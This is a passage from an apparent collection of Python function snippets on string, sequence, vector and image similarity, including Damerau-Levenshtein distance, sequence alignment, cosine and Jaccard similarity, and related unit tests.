(word, POS_TAG), ...]\n tagged_sentence_2 = pos_tag(tokenized_sentence_2) # [ (word, POS_TAG), ...]\n \n lemmas_sentence_1 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_1 if not tagged_word in stop_words] \n lemmas_sentence_2 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_2 if not tagged_word in stop_words] # [LEMMA_1, ...]\n \n word_seq_match = difflib.SequenceMatcher(None, tokenized_sentence_1, tokenized_sentence_2)\n word_match = word_seq_match.find_longest_match(0, len(tokenized_sentence_1), 0, len(tokenized_sentence_2))\n\n lemm_seq_match = difflib.SequenceMatcher(None, lemmas_sentence_1, lemmas_sentence_2)\n lemm_match = lemm_seq_match.find_longest_match(0, len(lemmas_sentence_1), 0, len(lemmas_sentence_2))\n\n word_sim = word_match.size/(max(len(tokenized_sentence_1), len(tokenized_sentence_2)) + 0.001)\n lemm_sim = lemm_match.size/(max(len(lemmas_sentence_1), len(lemmas_sentence_2)) + 0.001)\n\n return word_sim, lemm_sim", "def get_similarity(df):\n count = CountVectorizer()\n count_matrix = count.fit_transform(df[\"bag_of_words\"])\n cosine_sim = cosine_similarity(count_matrix, count_matrix)\n return cosine_sim", "def test_similarity_fixed():\n similarity = pm.compute_similarity_for_fixed(\"Rio de Janeiro\", \"São Paulo\")\n nose.tools.eq_(similarity, 0, \"Wrong fixed similarity\")\n similarity = pm.compute_similarity_for_fixed(\"Rio de Janeiro\", \"Rio de Janeiro\")\n nose.tools.eq_(similarity, 1, \"Wrong fixed similarity\")", "def calc_similarity(lhs, rhs):\n lhs_decomp = decompose(lhs)\n rhs_decomp = decompose(rhs)\n dist = editdistance.eval(lhs_decomp, rhs_decomp)\n max_len = max(len(lhs_decomp), len(rhs_decomp))\n sim = float(max_len - dist) / float(max_len)\n logging.debug('SIM: [%s] vs [%s] ==> %d / %d = %f', lhs.encode('UTF-8'), rhs.encode('UTF-8'),\n max_len - dist, max_len, sim)\n return sim", "def compute_local_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n #initialization of variables\n x_pos = -1\n y_pos = -1\n result_seq_x = ''\n result_seq_y = ''\n score = 0\n\n #determine start position in alignment_matrix as position with maximum value \n for row in range(len(seq_x) + 1):\n for col in range(len(seq_y) + 1):\n if alignment_matrix[row][col] > score:\n score = alignment_matrix[row][col]\n x_pos = row\n y_pos = col\n\n #start in start position and go upwards till we reach first entry with value 0\n #in every iteration we reconstruct alignments based on value in alignment_matrix and scoring_matrix\n while x_pos != 0 and y_pos !=0:\n current_value = alignment_matrix[x_pos][y_pos]\n if current_value == 0:\n break\n \n if current_value == alignment_matrix[x_pos-1][y_pos-1] + scoring_matrix[seq_x[x_pos-1]][seq_y[y_pos-1]]:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n x_pos -= 1\n y_pos -= 1\n elif current_value == alignment_matrix[x_pos-1][y_pos] + scoring_matrix[seq_x[x_pos-1]][\"-\"]:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = \"-\" + result_seq_y\n x_pos -= 1\n else: \n result_seq_x = \"-\" + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n y_pos -= 1\n\n return (score,result_seq_x,result_seq_y)", "def apply_similarity(reconstruction, s, A, b):\n # Align points.\n for point in reconstruction.points.values():\n Xp = s * A.dot(point.coordinates) + b\n point.coordinates = Xp.tolist()\n\n # Align cameras.\n for shot in reconstruction.shots.values():\n R = shot.pose.get_rotation_matrix()\n t = np.array(shot.pose.translation)\n Rp = R.dot(A.T)\n tp = -Rp.dot(b) + s * t\n shot.pose.set_rotation_matrix(Rp)\n shot.pose.translation = list(tp)", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def test_dice_similarity_matrix_compiled():\n vectors1 = np.array([[1, 1, 0, 0],\n [0, 0, 1, 1]])\n vectors2 = np.array([[0, 1, 1, 0],\n [1, 0, 1, 1]])\n\n scores = dice_similarity_matrix(vectors1, vectors2)\n expected_scores = np.array([[0.5, 0.4],\n [0.5, 0.8]])\n assert scores == pytest.approx(expected_scores, 1e-7), \"Expected different scores.\"", "def align(src, tgt):\n\n sm = SequenceMatcher(a=list(map(lambda x: x[0], tgt)), b=list(map(lambda x: x[0], src)))\n tgt_temp, src_temp = [], []\n opcodes = sm.get_opcodes()\n for tag, i1, i2, j1, j2 in opcodes:\n # If they are equal, do nothing except lowercase them\n if tag == 'equal':\n for i in range(i1, i2):\n tgt[i][1] = 'e'\n tgt_temp.append(tgt[i])\n for i in range(j1, j2):\n src[i][1] = 'e'\n src_temp.append(src[i])\n # For insertions and deletions, put a filler of '***' on the other one, and\n # make the other all caps\n elif tag == 'delete':\n for i in range(i1, i2):\n tgt[i][1] = 'd'\n tgt_temp.append(tgt[i])\n for i in range(i1, i2):\n src_temp.append(tgt[i])\n elif tag == 'insert':\n for i in range(j1, j2):\n src[i][1] = 'i'\n tgt_temp.append(src[i])\n for i in range(j1, j2):\n src_temp.append(src[i])\n # More complicated logic for a substitution\n elif tag == 'replace':\n for i in range(i1, i2):\n tgt[i][1] = 's'\n for i in range(j1, j2):\n src[i][1] = 's'\n tgt_temp += tgt[i1:i2]\n src_temp += src[j1:j2]\n \n src, tgt = GumarDataset.align_subsequences(src_temp, tgt_temp)\n return src, tgt", "def test_dice_similarity_matrix():\n vectors1 = np.array([[1, 1, 0, 0],\n [0, 0, 1, 1]])\n vectors2 = np.array([[0, 1, 1, 0],\n [1, 0, 1, 1]])\n\n scores = dice_similarity_matrix.py_func(vectors1, vectors2)\n expected_scores = np.array([[0.5, 0.4],\n [0.5, 0.8]])\n assert scores == pytest.approx(expected_scores, 1e-7), \"Expected different scores.\"", "def compute_similarity(im1, im2, test_id):\n\n results = dict()\n results['id'] = test_id\n results['test_im'] = im2\n results['mse_value'], results['mse_map'] = compute_mse(im1, im2)\n results['ssim_value'], results['ssim_map'] = compute_ssim(im1, im2, 5)\n results['cw_ssim_value'], results['cw_ssim_map'] = compute_cw_ssim(im1, im2, 30)\n results['gms_value'], results['gms_map'] = compute_gms(im1, im2)\n results['fsim_value'], results['pc_max_map'] = compute_fsim(im1, im2)\n\n return results", "def get_similarity(string1, string2, probabilities, characters):\n\n strict_counter = 0\n weak_counter = 0\n for i in range(0, len(string1)):\n if string1[i] == string2[i]:\n strict_counter+=1\n\n k = 0\n for prob in probabilities[i]:\n if ((prob != 0) & (string1[i] == characters[k])):\n weak_counter += 1\n break\n \n k+=1\n\n # Return list containing strict and weak probabilities\n return [(strict_counter / len(string1)) * 100, \n (weak_counter / len(string1)) * 100]", "def compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n #score = max([alignment_matrix[row][col] for row in range(len_x + 1) for col in range(len_y+1)])\n\n max_score = -1\n max_positions = []\n for row in range(len(seq_x)+1):\n for col in range(len(seq_y)+1):\n if alignment_matrix[row][col] == max_score:\n max_positions.append((row,col))\n if alignment_matrix[row][col] > max_score:\n max_score = alignment_matrix[row][col]\n max_positions = [(row, col)]\n max_row, max_col = random.choice(max_positions)\n\n #print max_score, max_row, max_col\n\n len_x = max_row\n len_y = max_col\n\n while alignment_matrix[len_x][len_y] > 0:\n #print len_x, len_y\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n #while len_x > 0:\n # align_x = seq_x[len_x-1] + align_x\n # align_y = \"-\" + align_y\n # len_x -= 1\n\n #while len_y > 0:\n # align_x = \"-\" + align_x\n # align_y = seq_y[len_y-1] + align_y\n # len_y -= 1\n\n return (max_score, align_x, align_y)", "def compute_global_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n #initialization of start position as bottom-right corner of matrix\n x_pos = len(seq_x)\n y_pos = len(seq_y)\n\n #initialization of variables\n result_seq_x = ''\n result_seq_y = ''\n score = alignment_matrix[x_pos][y_pos]\n\n #start in bottom right corner of matrix and go upwards till we reach left or upper edge\n #in every iteration we reconstruct alignments based on value in alignment_matrix and scoring_matrix\n while x_pos != 0 or y_pos !=0:\n current_value = alignment_matrix[x_pos][y_pos]\n \n if current_value == alignment_matrix[x_pos-1][y_pos-1] + scoring_matrix[seq_x[x_pos-1]][seq_y[y_pos-1]] and x_pos > 0 and y_pos > 0:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n x_pos -= 1\n y_pos -= 1\n elif current_value == alignment_matrix[x_pos-1][y_pos] + scoring_matrix[seq_x[x_pos-1]][\"-\"]:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = \"-\" + result_seq_y\n x_pos -= 1\n else: \n result_seq_x = \"-\" + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n y_pos -= 1\n\n return (score,result_seq_x,result_seq_y)", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n num_rows = len(seq_x)\n num_cols = len(seq_y)\n x_prime = ''\n y_prime = ''\n\n while num_rows != 0 and num_cols != 0:\n if alignment_matrix[num_rows][num_cols] == alignment_matrix[num_rows-1][num_cols-1] + scoring_matrix[seq_x[num_rows-1]][seq_y[num_cols-1]]:\n x_prime = seq_x[num_rows-1] + x_prime\n y_prime = seq_y[num_cols-1] + y_prime\n num_rows -= 1\n num_cols -= 1\n else:\n if alignment_matrix[num_rows][num_cols] == alignment_matrix[num_rows-1][num_cols] + scoring_matrix[seq_x[num_rows-1]]['-']:\n x_prime = seq_x[num_rows-1] + x_prime\n y_prime = '-' + y_prime\n num_rows -= 1\n else:\n x_prime = '-' + x_prime\n y_prime = seq_y[num_cols-1] + y_prime\n num_cols -= 1\n \n while num_rows != 0:\n x_prime = seq_x[num_rows-1] + x_prime\n y_prime = '-' + y_prime\n num_rows -= 1\n\n while num_cols != 0:\n x_prime = '-' + x_prime\n y_prime = seq_y[num_cols-1] + y_prime\n num_cols -= 1\n\n # compute score of alignment\n score = 0\n for position in range(len(x_prime)):\n score += scoring_matrix[x_prime[position]][y_prime[position]]\n\n return (score, x_prime, y_prime)", "def get_similarity(s1, s2):\n t0 = sorted(list(set(s1.split(' ')).intersection(set(s2.split(' ')))))\n t1 = sorted(list(set(t0 + s1.split(' '))))\n t2 = sorted(list(set(t0 + s2.split(' '))))\n\n r01 = SequenceMatcher(None, t0, t1).ratio()\n r02 = SequenceMatcher(None, t0, t2).ratio()\n r12 = SequenceMatcher(None, t1, t2).ratio()\n return max(r01, r02, r12)", "def findCenterSeq(dictofSeq):\n seqLen = len(dictofSeq)\n pwMatrix = [[\"-\"]*seqLen for i in range(seqLen)]\n listofSeq = []\n for key in dictofSeq:\n listofSeq.append(dictofSeq.get(key))\n \n findMin = []\n acc = 0\n for seq in listofSeq:\n for seq2 in listofSeq:\n # in1 gives row, in2 gives column \n in1 = listofSeq.index(seq)\n in2 = listofSeq.index(seq2)\n pwMatrix[in1][in2] = pairwise(seq, seq2)\n acc += pwMatrix[in1][in2]\n #TypeError: 'int' object is not subscriptable\n findMin.append(acc)\n acc = 0\n posSeq = findMin.index(min(findMin))\n refString = listofSeq[posSeq]\n refName = \"\"\n \n for name, seq in dictofSeq.items():\n if seq == refString:\n refName = name\n \n print(refName)\n \n return refName", "def word_similarity(self):\n y_true = []\n y_pred = []\n for i in open(\"data/word_sim_dataset.txt\").read().split('\\n'):\n i = self.preprocessor(i)\n w1 = i.split()[-1]\n w2 = i.split()[-2] \n st = float(i.split()[-3]) / 4 #dataset has scale from 0 to 4\n \n try:\n w1 = self.embeddings_index[w1] \n w2 = self.embeddings_index[w2] \n w1 = w1 / np.linalg.norm(w1)\n w2 = w2 / np.linalg.norm(w2)\n y_pred.append(np.dot(w1,w2))\n y_true.append(st)\n except:\n pass\n if y_true == []:\n return 1.0\n return mean_squared_error(y_true, y_pred, squared=False)", "def similarity(A: str, B: str, data: dict, Acentered: np.ndarray, pca_of_A: PCA):\r\n # Calculate E(A|B)\r\n A_by_B = pca_of_A_using_B(pca_of_A, Acentered, B, data[B])\r\n A_sqrd = np.power(A_by_B - data[A], 2)\r\n EAB = A_sqrd.mean(axis=0)\r\n\r\n # Calculate E(B|A)\r\n pca_of_B, mean_of_B, B_centered = cache_calcs(B, data[B])\r\n B_by_A = pca_of_A_using_B(pca_of_B, B_centered, A, data[A])\r\n B_sqrd = np.power(B_by_A - data[B], 2)\r\n EBA = B_sqrd.mean(axis=0)\r\n\r\n # Calculate similarity\r\n sim = 1 / 2 * (EAB + EBA)\r\n return sim", "def dameraulevenshtein(self, seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = range(1, len(seq2) + 1) + [0]\n for x in xrange(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in xrange(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def _calculate_trilinear_similarity(self, context, query, context_max_len, query_max_len,\n w4mlu, bias):\n\n subres0 = nd.tile(self.w4c(context), [1, 1, query_max_len])\n subres1 = nd.tile(nd.transpose(\n self.w4q(query), axes=(0, 2, 1)), [1, context_max_len, 1])\n subres2 = nd.batch_dot(w4mlu * context,\n nd.transpose(query, axes=(0, 2, 1)))\n similarity_mat = subres0 + subres1 + subres2 + bias\n return similarity_mat", "def optimal_string_alignment_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n\n for i in range(0, n1 + 1):\n dp[i][0] = i\n for j in range(0, n2 + 1):\n dp[0][j] = j\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n cost = 0 if s1[i - 1] == s2[j - 1] else 1\n\n dp[i][j] = min(dp[i][j - 1] + 1,\n dp[i - 1][j] + 1,\n dp[i - 1][j - 1] + cost)\n\n if i > 1 and j > 1 and s1[i - 1] == s2[j - 2] and s1[i - 2] == s2[j - 1]:\n dp[i][j] = min(dp[i][j], dp[i - 2][j - 2] + cost)\n\n return dp[n1][n2]", "def calculate_similarity(self, tfidf_matrix, test_tfidf):\n\n with open(DATASET.fold_root / 'tags_order.json') as file:\n tags_order = json.load(file)\n\n min_max_scaler = MinMaxScaler()\n\n n_clus = 2\n simis = []\n for test_q in test_tfidf:\n s = cosine_similarity(tfidf_matrix, test_q)\n\n # Sorting and getting indices of sorted similarities\n simi = s.transpose()[0]\n simi_values = np.sort(simi)[::-1][:200]\n simi_indices = simi.argsort()[::-1]\n\n breaks = jenkspy.jenks_breaks(simi_values, n_clus)\n simi_count = len(simi_values[breaks[-2] <= simi_values])\n\n q_tags = [self.train_set[i].tags for i in simi_indices][:simi_count]\n\n tags_votes = Counter(chain(*q_tags))\n all_count = sum(tags_votes.values())\n tags_likelihood = [tags_votes.get(\n tag, 0) / all_count for tag in tags_order]\n\n lh = np.array([float(x)\n for x in tags_likelihood]).reshape(-1, 1)\n normalized_lh = np.concatenate(\n min_max_scaler.fit_transform(lh)\n ).tolist()\n\n simis.append(normalized_lh)\n\n return simis", "def damerau_levenshtein_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(damerau_levenshtein_distance(s1, s2)) / max_cost", "def dameraulevenshtein(seq1, seq2):\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def match_word_sorted(code1, code2):\n list1 = code1.split(\" \")\n list2 = code2.split(\" \")\n set1 = set(list1)\n set2 = set(list2)\n common_words = set1 & set2\n try:\n common_words.remove(\"\")\n except:\n pass\n\n words_to_index = {}\n for word in common_words:\n in1 = list1.index(word)\n in2 = list2.index(word)\n words_to_index[word] = (in1, in2)\n sorted1 = OrderedDict(sorted(words_to_index.items(), key=lambda t: t[1][0])).keys()\n sorted2 = OrderedDict(sorted(words_to_index.items(), key=lambda t: t[1][1])).keys()\n\n a = Sequence(sorted1)\n b = Sequence(sorted2)\n v = Vocabulary()\n a_encoded = v.encodeSequence(a)\n b_encoded = v.encodeSequence(b)\n scoring = SimpleScoring(MATCH_SCORE, MISMATCH_SCORE)\n aligner = GlobalSequenceAligner(scoring, GAP_SCORE)\n score, encoders = aligner.align(a_encoded, b_encoded, backtrace=True)\n max_score = 0\n for i, encoded in enumerate(encoders):\n alignment = v.decodeSequenceAlignment(encoded)\n if alignment.score > max_score:\n max_score = alignment.score\n return max_score", "def string_match_ratio(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.ratio()", "def gram_schmidt(mat_a):\n # NOTE: We will use the same variable names as the one in the\n # pseudo code for clarity\n rows_count = mat_a.shape[0]\n\n u = mat_a.copy()\n r = np.zeros_like(u)\n q = np.zeros_like(u)\n for i in range(rows_count):\n u_i = u[:, i]\n r[i, i] = np.linalg.norm(u_i)\n q[:, i] = u_i / r[i, i] if r[i, i] != 0 else 0\n q_i = q[:, i]\n\n r[i, i + 1:] = q_i.T.dot(u[:, i + 1:])\n # np.outer will multiply q_i by each number in r[i, i + 1:], and create\n # a matrix that each column is a result of that multiplication\n u[:, i + 1:] -= np.outer(q_i, r[i, i + 1:])\n\n return q, r", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def embedding_similarity(model, validation_pairs):\n scores = dict()\n for pair in validation_pairs:\n author1 = pair[0]\n author2 = pair[1]\n scores[author1 + ' ' +\n author2] = cosine_similarity(model.wv[author1], model.wv[author2])\n return scores", "def levenshteinDistance(s1, s2):\n singleLetterMapping = {DOWNLEFT: '1', DOWN:'2', DOWNRIGHT:'3',\n LEFT:'4', RIGHT:'6',\n UPLEFT:'7', UP:'8', UPRIGHT:'9'}\n\n len1 = len([singleLetterMapping[letter] for letter in s1])\n len2 = len([singleLetterMapping[letter] for letter in s2])\n\n matrix = list(range(len1 + 1)) * (len2 + 1)\n for i in range(len2 + 1):\n matrix[i] = list(range(i, i + len1 + 1))\n for i in range(len2):\n for j in range(len1):\n if s1[j] == s2[i]:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j])\n else:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j] + 1)\n return matrix[len2][len1]", "def similarity(text1, text2):\n\n clean1 = clean(text1)\n clean2 = clean(text2)\n count_meas = src.utils.nlp.prompt_similarity(clean1, clean2, vectorizer=CountVectorizer)\n tfidt_meas = src.utils.nlp.prompt_similarity(clean1, clean2, vectorizer=TfidfVectorizer)\n similarity_dict = {'count': count_meas, 'tfidf': tfidt_meas}\n return similarity_dict", "def jaccard_similarity(string1, string2):\n\n a = set(string1.split())\n b = set(string2.split())\n\n similarity = float(\n len(a.intersection(b)) * 1.0\n / len(a.union(b)))\n\n return similarity", "def calculate_score(result):\n sample1=result['Sample1']\n sample2=result['Sample2']\n string1=paragraph_to_list(sample1)\n string2=paragraph_to_list(sample2)\n \n return round( strings_similarity(string1, string2), 2)\n #method_dict=strings_count_compare(string1, string2)/ max(len(string1), len(string2))\n #return round(0.5*(method_difflab+method_dict), 2)", "def do_semiglobal_alignment(sequences, matrix, penalty):\n seq1 = '-' + sequences[0].Sequence\n seq2 = '-' + sequences[1].Sequence\n\n # scoring matrix initializer\n scoring = local_setup(len(seq1), len(seq2))\n\n # fill scoring matrix\n aa_start = ord('A')\n for i in range(1, len(seq1)):\n aa_x = seq1[i]\n for j in range(1, len(seq2)):\n aa_y = seq2[j]\n xgap = scoring[i][j-1] - penalty\n ygap = scoring[i-1][j] - penalty\n match = scoring[i-1][j-1] + \\\n matrix[ord(aa_x) - aa_start][ord(aa_y) - aa_start]\n\n # store the max score\n scoring[i].append(max([xgap, ygap, match]))\n\n # find the max score (only the last max score)\n max_i, max_j, max_score = 0, 0, -float('inf')\n for j in range(len(scoring[-1])): # find max low road\n if scoring[-1][j] >= max_score:\n max_i, max_j, max_score = -1, j, scoring[-1][j]\n\n for i in range(len(scoring)): # find max high road (priority)\n if scoring[i][-1] >= max_score:\n max_i, max_j, max_score = i, -1, scoring[i][-1]\n\n # perform traceback\n alignment = traceback(\n scoring, seq1, seq2, penalty, matrix, max_i, max_j, semi=True\n )\n\n # add the endgaps for seq1\n if max_i == -1 and max_j != len(scoring[-1]):\n for j in range(max_j + 1, len(scoring[-1])):\n alignment[0][0] += '-'\n alignment[1][0] += ' '\n alignment[2][0] += seq2[j]\n\n # add the endgaps for seq2\n if max_j == -1 and max_i != len(scoring):\n for i in range(max_i + 1, len(scoring)):\n alignment[0][0] += seq1[i]\n alignment[1][0] += ' '\n alignment[2][0] += '-'\n\n # Add the sequences to the scoring matrix for visualizing\n scoring = add_sequences_to_scoring(scoring, seq1, seq2)\n\n return alignment, scoring", "def cosine_similarity(vec_x, vec_y):\n sim_prod = 0.0\n len_x = 0\n len_y = 0\n\n for ngram in vec_x:\n len_x += vec_x[ngram] ** 2\n\n for ngram in vec_y:\n len_y += vec_y[ngram] ** 2\n\n len_x = math.sqrt(len_x)\n len_y = math.sqrt(len_y)\n\n for ngram in vec_x:\n if ngram in vec_y:\n sim_prod += vec_x[ngram] * vec_y[ngram]\n\n return sim_prod / (len_x * len_y)", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score", "def similar(text, database):\n # TODO\n pass", "def word_order_similarity(self,sentence_1, sentence_2):\n\t words_1 = sentence_1.getList_of_words()\n\t words_2 = sentence_2.getList_of_words()\n\t joint_words = list(set(words_1).union(set(words_2)))\n\t windex = {x[1]: x[0] for x in enumerate(joint_words)}\n\t r1 = self.word_order_vector(words_1, joint_words, windex)\n\t r2 = self.word_order_vector(words_2, joint_words, windex)\n\t return 1.0 - (np.linalg.norm(r1 - r2) / np.linalg.norm(r1 + r2))", "def test_string_similarity_constraint():\n f = SimilarityConstraint(func=LevenshteinDistance(), pred=GreaterThan(0.5))\n assert f('BROOKLYN', 'BROKLYN')\n assert not f('BROOKLYN', 'QUEENS')", "def strassen(m1, m2):\n \n if ((m1.shape[0] % 2 == 0) or (m1.shape[0] == 1)):\n n = m1.shape[0] \n else:\n n = m1.shape[0] + 1\n result = np.zeros((n, n), dtype = int)\n \n if (n == 1):\n result[0][0] = m1[0][0] * m2[0][0]\n else:\n new = n//2\n \n a11, a12, a21, a22 = m1[:new, :new], m1[new:, :new], m1[:new, new:], m1[new:, new:]\n b11, b12, b21, b22 = m2[:new, :new], m2[new:, :new], m2[:new, new:], m2[new:, new:]\n \n p1 = strassen(a11, b12 - b22)\n p2 = strassen(a11 + a12, b22)\n p3 = strassen(a21 + a22, b11)\n p4 = strassen(a22, b21 - b11)\n p5 = strassen(a11 + a22, b11 + b22)\n p6 = strassen(a12 - a22, b21 + b22)\n p7 = strassen(a11 - a21, b11 + b12)\n \n result[:new, :new] = p5 + p4 - p2 + p6\n result[new:, :new] = p1 + p2\n result[:new, new:] = p3 + p4 \n result[new:, new:] = p5 + p1 - p3 - p7\n \n return result", "def similarity(self, new_sentence):\n cleaned = self.clean_string(new_sentence)\n stemmed = self.stem(cleaned, train=False)\n\n if not set(stemmed).intersection(set(self.vocabulary.keys())):\n return None\n\n else:\n difference = set(stemmed) - set(self.vocabulary.keys())\n to_append = np.zeros((self.matrix.shape[0], len(difference)))\n matrix = np.append(self.matrix, to_append, axis=1)\n\n new_voc = copy.deepcopy(self.vocabulary)\n for word in difference:\n if word not in new_voc:\n new_voc[word] = len(new_voc)\n\n question_vector = self.stem2vec(stemmed, new_voc)\n result = np.matmul(matrix, question_vector)\n return np.argmax(result)", "def _calculate_similarity(self):\n self._logger.info(\"Calculating the similarity between images.\")\n\n # Create a helper function to simplify the loops below:\n def get_wrapper(fdx, mdx):\n wrapper = pos_wrappers.image_similarity_wrapper(\n reference_image=self.f['src_gray'](idx=fdx),\n moving_image=self.f['src_gray'](idx=mdx),\n affine_transformation=self.f['part_transf'](mIdx=mdx, fIdx=fdx))\n return copy.copy(wrapper)\n\n commands = [] # Will hold commands for calculating the similarity\n\n # Will hold (moving, fixed) 